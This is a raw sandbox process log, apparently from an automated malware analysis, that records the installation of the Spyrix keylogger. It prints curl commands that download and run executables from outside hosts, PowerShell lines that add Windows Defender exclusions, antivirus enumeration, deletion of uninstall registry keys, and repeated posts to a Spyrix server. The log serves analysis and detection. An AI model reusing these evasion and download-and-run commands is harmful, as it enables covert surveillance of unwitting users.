Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1936,i,1509766979292889431,16591483089158193991,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "sem"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spkl.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spkl"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq clv.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "clv"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\181531736511434"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\\eb90c874-90f1-477e-bf8d-92cb4599bdb5.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	Process created: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp "C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp" /SL5="$30454,32862490,227328,C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\d.cmd
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\pswd.cmd
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex.cmd
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user\AppData\Local\Temp\nse"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: unknown unknown
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "sem"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spkl.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spkl"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq clv.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "clv"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1936,i,1509766979292889431,16591483089158193991,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
